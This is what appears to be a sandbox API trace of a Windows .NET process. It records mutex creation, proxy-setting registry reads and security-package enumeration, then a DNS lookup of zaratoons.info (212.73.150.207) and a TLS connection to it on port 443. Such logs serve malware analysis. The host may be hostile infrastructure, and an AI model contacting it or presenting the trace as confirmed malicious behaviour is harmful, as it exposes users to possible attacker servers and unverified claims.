	[0902.281] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd50a8, cbSid=0x1c8bd760 | out: pSid=0x2fd50a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8bd760) returned 1
	[0902.281] CreateMutexW (lpMutexAttributes=0x2fd5260, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.281] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd5ec8, cbSid=0x1c8bd760 | out: pSid=0x2fd5ec8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8bd760) returned 1
	[0902.281] CreateMutexW (lpMutexAttributes=0x2fd6080, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.281] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd6ce0, cbSid=0x1c8bd760 | out: pSid=0x2fd6ce0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8bd760) returned 1
	[0902.282] CreateMutexW (lpMutexAttributes=0x2fd6e98, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.282] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd7b08, cbSid=0x1c8bd760 | out: pSid=0x2fd7b08*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8bd760) returned 1
	[0902.282] CreateMutexW (lpMutexAttributes=0x2fd7cc0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.282] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd8928, cbSid=0x1c8bd760 | out: pSid=0x2fd8928*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8bd760) returned 1
	[0902.282] CreateMutexW (lpMutexAttributes=0x2fd8ae0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.283] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x418
	[0902.283] ioctlsocket (in: s=0x40c, cmd=-2147195266, argp=0x1c8bdd98 | out: argp=0x1c8bdd98) returned 0
	[0902.283] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x41c
	[0902.284] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x420
	[0902.284] ioctlsocket (in: s=0x41c, cmd=-2147195266, argp=0x1c8bdd98 | out: argp=0x1c8bdd98) returned 0
	[0902.284] WSAIoctl (in: s=0x40c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c8bdd10, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c8bdd10, lpOverlapped=0x0) returned -1
	[0902.285] CoTaskMemAlloc (cb=0x204) returned 0x269d70
	[0902.285] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x269d70, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0902.285] CoTaskMemFree (pv=0x269d70) 
	[0902.285] WSAEventSelect (s=0x40c, hEventObject=0x418, lNetworkEvents=512) returned 0
	[0902.285] WSAIoctl (in: s=0x41c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c8bdd10, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c8bdd10, lpOverlapped=0x0) returned -1
	[0902.285] CoTaskMemAlloc (cb=0x204) returned 0x269d70
	[0902.285] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x269d70, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0902.285] CoTaskMemFree (pv=0x269d70) 
	[0902.285] WSAEventSelect (s=0x41c, hEventObject=0x420, lNetworkEvents=512) returned 0
	[0902.286] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x424, param_3=0x3) returned 0x0
	[0902.289] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c8bde50 | out: phkResult=0x1c8bde50*=0x43c) returned 0x0
	[0902.289] RegOpenKeyExW (in: hKey=0x43c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8bdd38 | out: phkResult=0x1c8bdd38*=0x440) returned 0x0
	[0902.289] RegNotifyChangeKeyValue (hKey=0x440, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x444, fAsynchronous=1) returned 0x0
	[0902.290] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8bdd60 | out: phkResult=0x1c8bdd60*=0x448) returned 0x0
	[0902.290] RegNotifyChangeKeyValue (hKey=0x448, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x44c, fAsynchronous=1) returned 0x0
	[0902.290] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8bdd60 | out: phkResult=0x1c8bdd60*=0x450) returned 0x0
	[0902.290] RegNotifyChangeKeyValue (hKey=0x450, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x454, fAsynchronous=1) returned 0x0
	[0902.290] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bdcc8 | out: TokenHandle=0x1c8bdcc8*=0x458) returned 1
	[0902.296] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.296] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd498 | out: TokenHandle=0x1c8bd498*=0x45c) returned 1
	[0902.300] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.300] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd498 | out: TokenHandle=0x1c8bd498*=0x460) returned 1
	[0902.310] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c8bdd98 | out: pProxyConfig=0x1c8bdd98) returned 1
	[0904.457] SetEvent (hEvent=0x384) returned 1
	[0905.248] GetCurrentProcess () returned 0xffffffffffffffff
	[0905.248] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd508 | out: TokenHandle=0x1c8bd508*=0x4b0) returned 1
	[0905.251] GetCurrentProcess () returned 0xffffffffffffffff
	[0905.251] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd508 | out: TokenHandle=0x1c8bd508*=0x4b4) returned 1
	[0905.252] SetEvent (hEvent=0x384) returned 1
	[0905.538] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c8bd9d8 | out: pFixedInfo=0x0, pOutBufLen=0x1c8bd9d8) returned 0x6f
	[0905.776] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b93cc70
	[0905.777] GetNetworkParams (in: pFixedInfo=0x1b93cc70, pOutBufLen=0x1c8bd9d8 | out: pFixedInfo=0x1b93cc70, pOutBufLen=0x1c8bd9d8) returned 0x0
	[0905.926] CoTaskMemAlloc (cb=0xd) returned 0x1b916c80
	[0905.927] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0905.927] CoTaskMemFree (pv=0x1b916c80) 
	[0905.929] LocalFree (hMem=0x1b93cc70) returned 0x0
	[0905.943] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8
	[0905.944] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c4
	[0905.946] CoTaskMemAlloc (cb=0x10) returned 0x1b916c80
	[0905.947] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c8bd980*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c8bd978 | out: ppResult=0x1c8bd978*=0x1b8f6300*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x1b916e80*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0907.457] CoTaskMemFree (pv=0x1b916c80) 
	[0907.457] CoTaskMemFree (pv=0x0) 
	[0907.458] FreeAddrInfoW (pAddrInfo=0x1b8f6300*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x1b916e80*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0907.459] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d8
	[0907.459] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d0
	[0907.459] ioctlsocket (in: s=0x4d8, cmd=-2147195266, argp=0x1c8bd998 | out: argp=0x1c8bd998) returned 0
	[0907.459] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e0
	[0907.459] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e4
	[0907.460] ioctlsocket (in: s=0x4e0, cmd=-2147195266, argp=0x1c8bd998 | out: argp=0x1c8bd998) returned 0
	[0907.460] WSAIoctl (in: s=0x4d8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c8bd910, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c8bd910, lpOverlapped=0x0) returned -1
	[0907.460] CoTaskMemAlloc (cb=0x204) returned 0x269d70
	[0907.460] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x269d70, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0907.460] CoTaskMemFree (pv=0x269d70) 
	[0907.460] WSAEventSelect (s=0x4d8, hEventObject=0x4d0, lNetworkEvents=512) returned 0
	[0907.460] WSAIoctl (in: s=0x4e0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c8bd910, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c8bd910, lpOverlapped=0x0) returned -1
	[0907.460] CoTaskMemAlloc (cb=0x204) returned 0x269d70
	[0907.460] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x269d70, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0907.460] CoTaskMemFree (pv=0x269d70) 
	[0907.460] WSAEventSelect (s=0x4e0, hEventObject=0x4e4, lNetworkEvents=512) returned 0
	[0907.462] GetAdaptersAddresses () returned 0x6f
	[0907.608] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b947540
	[0907.609] GetAdaptersAddresses () returned 0x0
	[0907.670] LocalFree (hMem=0x1b947540) returned 0x0
	[0907.673] WSAConnect (in: s=0x4c8, name=0x2fe4450*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0907.864] closesocket (s=0x4c4) returned 0
	[0907.889] EnumerateSecurityPackagesW (in: pcPackages=0x1c8bd7f8, ppPackageInfo=0x1c8bd7f0 | out: pcPackages=0x1c8bd7f8, ppPackageInfo=0x1c8bd7f0) returned 0x0
	[0907.891] CoTaskMemAlloc (cb=0x16) returned 0x1b916e60
	[0907.891] RtlMoveMemory (in: Destination=0x1b916e60, Source=0x240b90, Length=0x14 | out: Destination=0x1b916e60) 
	[0907.891] CoTaskMemFree (pv=0x1b916e60) 
	[0907.891] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0907.891] CoTaskMemAlloc (cb=0x3c) returned 0x1b938a20
	[0907.891] RtlMoveMemory (in: Destination=0x1b938a20, Source=0x240ba4, Length=0x3a | out: Destination=0x1b938a20) 
	[0907.891] CoTaskMemFree (pv=0x1b938a20) 
	[0907.891] lstrlenW (lpString="NegoExtender") returned 12
	[0907.891] CoTaskMemAlloc (cb=0x1c) returned 0x1b939ad0
	[0907.891] RtlMoveMemory (in: Destination=0x1b939ad0, Source=0x240bde, Length=0x1a | out: Destination=0x1b939ad0) 
	[0907.891] CoTaskMemFree (pv=0x1b939ad0) 
	[0907.891] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0907.891] CoTaskMemAlloc (cb=0x3e) returned 0x1b938a20
	[0907.891] RtlMoveMemory (in: Destination=0x1b938a20, Source=0x240bf8, Length=0x3c | out: Destination=0x1b938a20) 
	[0907.891] CoTaskMemFree (pv=0x1b938a20) 
	[0907.891] lstrlenW (lpString="Kerberos") returned 8
	[0907.891] CoTaskMemAlloc (cb=0x14) returned 0x1b916e60
	[0907.891] RtlMoveMemory (in: Destination=0x1b916e60, Source=0x240c34, Length=0x12 | out: Destination=0x1b916e60) 
	[0907.891] CoTaskMemFree (pv=0x1b916e60) 
	[0907.891] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0907.891] CoTaskMemAlloc (cb=0x32) returned 0x1b8f6380
	[0907.891] RtlMoveMemory (in: Destination=0x1b8f6380, Source=0x240c46, Length=0x30 | out: Destination=0x1b8f6380) 
	[0907.891] CoTaskMemFree (pv=0x1b8f6380) 
	[0907.892] lstrlenW (lpString="NTLM") returned 4
	[0907.892] CoTaskMemAlloc (cb=0xc) returned 0x1b916e60
	[0907.892] RtlMoveMemory (in: Destination=0x1b916e60, Source=0x240c76, Length=0xa | out: Destination=0x1b916e60) 
	[0907.892] CoTaskMemFree (pv=0x1b916e60) 
	[0907.892] lstrlenW (lpString="NTLM Security Package") returned 21
	[0907.892] CoTaskMemAlloc (cb=0x2e) returned 0x1b8f6380
	[0907.892] RtlMoveMemory (in: Destination=0x1b8f6380, Source=0x240c80, Length=0x2c | out: Destination=0x1b8f6380) 
	[0907.892] CoTaskMemFree (pv=0x1b8f6380) 
	[0907.892] lstrlenW (lpString="Schannel") returned 8
	[0907.892] CoTaskMemAlloc (cb=0x14) returned 0x1b916e60
	[0907.892] RtlMoveMemory (in: Destination=0x1b916e60, Source=0x240cac, Length=0x12 | out: Destination=0x1b916e60) 
	[0907.892] CoTaskMemFree (pv=0x1b916e60) 
	[0907.892] lstrlenW (lpString="Schannel Security Package") returned 25
	[0907.892] CoTaskMemAlloc (cb=0x36) returned 0x1b8f6380
	[0907.892] RtlMoveMemory (in: Destination=0x1b8f6380, Source=0x240cbe, Length=0x34 | out: Destination=0x1b8f6380) 
	[0907.892] CoTaskMemFree (pv=0x1b8f6380) 
	[0907.892] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0907.892] CoTaskMemAlloc (cb=0x5c) returned 0x1b909f60
	[0907.892] RtlMoveMemory (in: Destination=0x1b909f60, Source=0x240cf2, Length=0x5a | out: Destination=0x1b909f60) 
	[0907.892] CoTaskMemFree (pv=0x1b909f60) 
	[0907.892] lstrlenW (lpString="Schannel Security Package") returned 25
	[0907.892] CoTaskMemAlloc (cb=0x36) returned 0x1b8f6380
	[0907.892] RtlMoveMemory (in: Destination=0x1b8f6380, Source=0x240d4c, Length=0x34 | out: Destination=0x1b8f6380) 
	[0907.892] CoTaskMemFree (pv=0x1b8f6380) 
	[0907.892] lstrlenW (lpString="WDigest") returned 7
	[0907.892] CoTaskMemAlloc (cb=0x12) returned 0x1b916e60
	[0907.892] RtlMoveMemory (in: Destination=0x1b916e60, Source=0x240d80, Length=0x10 | out: Destination=0x1b916e60) 
	[0907.892] CoTaskMemFree (pv=0x1b916e60) 
	[0907.892] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0907.892] CoTaskMemAlloc (cb=0x46) returned 0x1b938a20
	[0907.893] RtlMoveMemory (in: Destination=0x1b938a20, Source=0x240d90, Length=0x44 | out: Destination=0x1b938a20) 
	[0907.893] CoTaskMemFree (pv=0x1b938a20) 
	[0907.893] lstrlenW (lpString="TSSSP") returned 5
	[0907.893] CoTaskMemAlloc (cb=0xe) returned 0x1b916e60
	[0907.893] RtlMoveMemory (in: Destination=0x1b916e60, Source=0x240dd4, Length=0xc | out: Destination=0x1b916e60) 
	[0907.893] CoTaskMemFree (pv=0x1b916e60) 
	[0907.893] lstrlenW (lpString="TS Service Security Package") returned 27
	[0907.893] CoTaskMemAlloc (cb=0x3a) returned 0x1b938a20
	[0907.893] RtlMoveMemory (in: Destination=0x1b938a20, Source=0x240de0, Length=0x38 | out: Destination=0x1b938a20) 
	[0907.893] CoTaskMemFree (pv=0x1b938a20) 
	[0907.893] lstrlenW (lpString="pku2u") returned 5
	[0907.893] CoTaskMemAlloc (cb=0xe) returned 0x1b916e60
	[0907.893] RtlMoveMemory (in: Destination=0x1b916e60, Source=0x240e18, Length=0xc | out: Destination=0x1b916e60) 
	[0907.893] CoTaskMemFree (pv=0x1b916e60) 
	[0907.893] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0907.893] CoTaskMemAlloc (cb=0x30) returned 0x1b8f6380
	[0907.893] RtlMoveMemory (in: Destination=0x1b8f6380, Source=0x240e24, Length=0x2e | out: Destination=0x1b8f6380) 
	[0907.893] CoTaskMemFree (pv=0x1b8f6380) 
	[0907.893] lstrlenW (lpString="CREDSSP") returned 7
	[0907.893] CoTaskMemAlloc (cb=0x12) returned 0x1b916e60
	[0907.893] RtlMoveMemory (in: Destination=0x1b916e60, Source=0x240e52, Length=0x10 | out: Destination=0x1b916e60) 
	[0907.893] CoTaskMemFree (pv=0x1b916e60) 
	[0907.893] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0907.893] CoTaskMemAlloc (cb=0x4a) returned 0x1b93aa70
	[0907.893] RtlMoveMemory (in: Destination=0x1b93aa70, Source=0x240e62, Length=0x48 | out: Destination=0x1b93aa70) 
	[0907.893] CoTaskMemFree (pv=0x1b93aa70) 
	[0907.894] FreeContextBuffer (in: pvContextBuffer=0x240a50 | out: pvContextBuffer=0x240a50) returned 0x0
	[0907.897] GetCurrentProcess () returned 0xffffffffffffffff
	[0907.897] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd2d8 | out: TokenHandle=0x1c8bd2d8*=0x4c4) returned 1
	[0907.900] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2fe8608, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c8bd1e8, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c8bd1d8, ptsExpiry=0x1c8bd1d0 | out: phCredential=0x1c8bd1d8, ptsExpiry=0x1c8bd1d0) returned 0x0
	[0908.039] InitializeSecurityContextW (in: phCredential=0x1c8bd3e0, phContext=0x0, pTargetName=0x2fdd070, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c8bd3d0, pOutput=0x2fead50, pfContextAttr=0x1c8bd3c8, ptsExpiry=0x1c8bd3c0 | out: phNewContext=0x1c8bd3d0, pOutput=0x2fead50, pfContextAttr=0x1c8bd3c8, ptsExpiry=0x1c8bd3c0) returned 0x90312
	[0908.972] FreeContextBuffer (in: pvContextBuffer=0x27aac0 | out: pvContextBuffer=0x27aac0) returned 0x0
	[0908.979] send (s=0x4c8, buf=0x2feae20*, len=118, flags=0) returned 118
	[0908.980] recv (in: s=0x4c8, buf=0x2feae20, len=5, flags=0 | out: buf=0x2feae20*) returned 5
	[0909.159] recv (in: s=0x4c8, buf=0x2feae25, len=93, flags=0 | out: buf=0x2feae25*) returned 93
	[0909.160] InitializeSecurityContextW (in: phCredential=0x1c8bd300, phContext=0x1c8bd5b0, pTargetName=0x2fdd070, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2feb130, Reserved2=0x0, phNewContext=0x1c8bd2f0, pOutput=0x2feb150, pfContextAttr=0x1c8bd2e8, ptsExpiry=0x1c8bd2e0 | out: phNewContext=0x1c8bd2f0, pOutput=0x2feb150, pfContextAttr=0x1c8bd2e8, ptsExpiry=0x1c8bd2e0) returned 0x90312
	[0909.161] recv (in: s=0x4c8, buf=0x2feb240, len=5, flags=0 | out: buf=0x2feb240*) returned 5
	[0909.161] recv (in: s=0x4c8, buf=0x2feb265, len=2556, flags=0 | out: buf=0x2feb265*) returned 2556
	[0909.161] InitializeSecurityContextW (in: phCredential=0x1c8bd230, phContext=0x1c8bd4e0, pTargetName=0x2fdd070, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2febd38, Reserved2=0x0, phNewContext=0x1c8bd220, pOutput=0x2febd58, pfContextAttr=0x1c8bd218, ptsExpiry=0x1c8bd210 | out: phNewContext=0x1c8bd220, pOutput=0x2febd58, pfContextAttr=0x1c8bd218, ptsExpiry=0x1c8bd210) returned 0x90312
	[0909.161] recv (in: s=0x4c8, buf=0x2febe48, len=5, flags=0 | out: buf=0x2febe48*) returned 5
	[0909.161] recv (in: s=0x4c8, buf=0x2febe6d, len=331, flags=0 | out: buf=0x2febe6d*) returned 16
	[0909.162] recv (in: s=0x4c8, buf=0x2febe7d, len=315, flags=0 | out: buf=0x2febe7d*) returned 315
	[0909.163] InitializeSecurityContextW (in: phCredential=0x1c8bd160, phContext=0x1c8bd410, pTargetName=0x2fdd070, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fec088, Reserved2=0x0, phNewContext=0x1c8bd150, pOutput=0x2fec0a8, pfContextAttr=0x1c8bd148, ptsExpiry=0x1c8bd140 | out: phNewContext=0x1c8bd150, pOutput=0x2fec0a8, pfContextAttr=0x1c8bd148, ptsExpiry=0x1c8bd140) returned 0x90312
	[0909.164] recv (in: s=0x4c8, buf=0x2fec198, len=5, flags=0 | out: buf=0x2fec198*) returned 5
	[0909.165] recv (in: s=0x4c8, buf=0x2fec1bd, len=4, flags=0 | out: buf=0x2fec1bd*) returned 4
	[0909.165] InitializeSecurityContextW (in: phCredential=0x1c8bd090, phContext=0x1c8bd340, pTargetName=0x2fdd070, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fec298, Reserved2=0x0, phNewContext=0x1c8bd080, pOutput=0x2fec2b8, pfContextAttr=0x1c8bd078, ptsExpiry=0x1c8bd070 | out: phNewContext=0x1c8bd080, pOutput=0x2fec2b8, pfContextAttr=0x1c8bd078, ptsExpiry=0x1c8bd070) returned 0x90312
	[0909.175] FreeContextBuffer (in: pvContextBuffer=0x278d40 | out: pvContextBuffer=0x278d40) returned 0x0
	[0909.175] send (s=0x4c8, buf=0x2fec388*, len=134, flags=0) returned 134
	[0909.175] recv (in: s=0x4c8, buf=0x2fec388, len=5, flags=0 | out: buf=0x2fec388*) returned 5
	[0909.275] recv (in: s=0x4c8, buf=0x2fec38d, len=1, flags=0 | out: buf=0x2fec38d*) returned 1
	[0909.275] InitializeSecurityContextW (in: phCredential=0x1c8bcfc0, phContext=0x1c8bd270, pTargetName=0x2fdd070, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fec500, Reserved2=0x0, phNewContext=0x1c8bcfb0, pOutput=0x2fec520, pfContextAttr=0x1c8bcfa8, ptsExpiry=0x1c8bcfa0 | out: phNewContext=0x1c8bcfb0, pOutput=0x2fec520, pfContextAttr=0x1c8bcfa8, ptsExpiry=0x1c8bcfa0) returned 0x90312
	[0909.276] recv (in: s=0x4c8, buf=0x2fec610, len=5, flags=0 | out: buf=0x2fec610*) returned 5
	[0909.276] recv (in: s=0x4c8, buf=0x2fec635, len=48, flags=0 | out: buf=0x2fec635*) returned 48
	[0909.276] InitializeSecurityContextW (in: phCredential=0x1c8bcef0, phContext=0x1c8bd1a0, pTargetName=0x2fdd070, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fec738, Reserved2=0x0, phNewContext=0x1c8bcee0, pOutput=0x2fec758, pfContextAttr=0x1c8bced8, ptsExpiry=0x1c8bced0 | out: phNewContext=0x1c8bcee0, pOutput=0x2fec758, pfContextAttr=0x1c8bced8, ptsExpiry=0x1c8bced0) returned 0x0
	[0909.289] QueryContextAttributesW (in: phContext=0x1c8bd150, ulAttribute=0x4, pBuffer=0x2fec870 | out: pBuffer=0x2fec870) returned 0x0
	[0909.289] QueryContextAttributesW (in: phContext=0x1c8bd150, ulAttribute=0x5a, pBuffer=0x2fec8f0 | out: pBuffer=0x2fec8f0) returned 0x0
	[0909.296] QueryContextAttributesW (in: phContext=0x1c8bd000, ulAttribute=0x53, pBuffer=0x2fecc40 | out: pBuffer=0x2fecc40) returned 0x0
	[0909.302] CertDuplicateCRLContext (pCrlContext=0x1b90e2f0) returned 0x1b90e2f0
	[0909.304] CertDuplicateStore (hCertStore=0x1b93ee70) returned 0x1b93ee70
	[0909.305] CertEnumCertificatesInStore (hCertStore=0x1b93ee70, pPrevCertContext=0x0) returned 0x1b90e370
	[0909.305] CertDuplicateCRLContext (pCrlContext=0x1b90e370) returned 0x1b90e370
	[0909.306] CertEnumCertificatesInStore (hCertStore=0x1b93ee70, pPrevCertContext=0x1b90e370) returned 0x1b90e2f0
	[0909.306] CertDuplicateCRLContext (pCrlContext=0x1b90e2f0) returned 0x1b90e2f0
	[0909.306] CertEnumCertificatesInStore (hCertStore=0x1b93ee70, pPrevCertContext=0x1b90e2f0) returned 0x0
	[0909.306] CertCloseStore (hCertStore=0x1b93ee70, dwFlags=0x0) returned 1
	[0909.306] CertFreeCRLContext (pCrlContext=0x1b90e2f0) returned 1
	[0909.558] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x1b93ef40
	[0909.559] CertAddCRLLinkToStore (in: hCertStore=0x1b93ef40, pCrlContext=0x1b90e370, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0909.559] CertAddCRLLinkToStore (in: hCertStore=0x1b93ef40, pCrlContext=0x1b90e2f0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0909.561] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b90e2f0, pTime=0x1c8bd008, hAdditionalStore=0x1b93ef40, pChainPara=0x1c8bd010, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c8bd000 | out: ppChainContext=0x1c8bd000) returned 1
	[0913.007] CertDuplicateCertificateChain (pChainContext=0x1cd84160) returned 0x1cd84160
	[0913.009] CertDuplicateCRLContext (pCrlContext=0x1b90e2f0) returned 0x1b90e2f0
	[0913.009] CertDuplicateCRLContext (pCrlContext=0x1cdcf760) returned 0x1cdcf760
	[0913.009] CertDuplicateCRLContext (pCrlContext=0x1cdcf7e0) returned 0x1cdcf7e0
	[0913.403] CertFreeCertificateChain (pChainContext=0x1cd84160) 
	[0913.404] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1cd84160, pPolicyPara=0x1c8bd188, pPolicyStatus=0x1c8bd168 | out: pPolicyStatus=0x1c8bd168) returned 1
	[0913.406] SetLastError (dwErrCode=0x0) 
	[0913.413] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1cd84160, pPolicyPara=0x1c8bd260, pPolicyStatus=0x1c8bd248 | out: pPolicyStatus=0x1c8bd248) returned 1
	[0913.417] CertFreeCertificateChain (pChainContext=0x1cd84160) 
	[0913.417] CertFreeCRLContext (pCrlContext=0x1b90e2f0) returned 1
